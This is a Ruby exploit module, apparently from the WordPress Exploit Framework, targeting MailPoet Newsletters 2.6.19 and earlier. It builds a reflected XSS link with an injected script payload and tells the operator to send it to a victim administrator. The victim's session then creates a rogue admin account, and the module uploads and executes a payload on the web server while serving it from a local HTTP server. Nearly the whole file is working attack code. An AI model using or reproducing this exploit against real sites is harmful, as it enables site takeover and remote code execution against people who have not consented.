# frozen_string_literal: true

class Wpxf::Exploit::MailpoetNewslettersReflectedXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::Xss

  def initialize
    super

    update_info(
      name: 'MailPoet Newsletters <= 2.6.19 Reflected XSS Shell Upload',
      desc: 'This module prepares a payload and link that can be sent to an '\
            'admin user which when visited with a valid session will create '\
            'a new admin user which will be used to upload and execute the '\
            'selected payload in the context of the web server.',
      author: [
        'Netsparker', # Discovery and disclosure
        'rastating'   # WPXF module
      ],
      references: [
        ['WPVDB', '8373'],
        ['URL', 'https://www.netsparker.com/ns-16-002-xss-vulnerability-identified-in-mailpoet-newsletters/']
      ],
      date: 'Feb 02 2016'
    )
  end

  def check
    check_plugin_version_from_readme('wysija-newsletters', '2.7')
  end

  def url_with_xss
    "#{full_uri}?wysija-page=1&controller=confirm&wysija-key='"\
    "\"--></style></script><script>#{xss_ascii_encoded_include_script}"\
    '</script>&action=unsubscribe&demo=1&wysijap=subscriptions'
  end

  def run
    return false unless super

    @success = false
    emit_info 'Provide the URL below to the victim to begin the payload upload'
    puts
    puts url_with_xss
    puts

    start_http_server
    return @success
  end
end
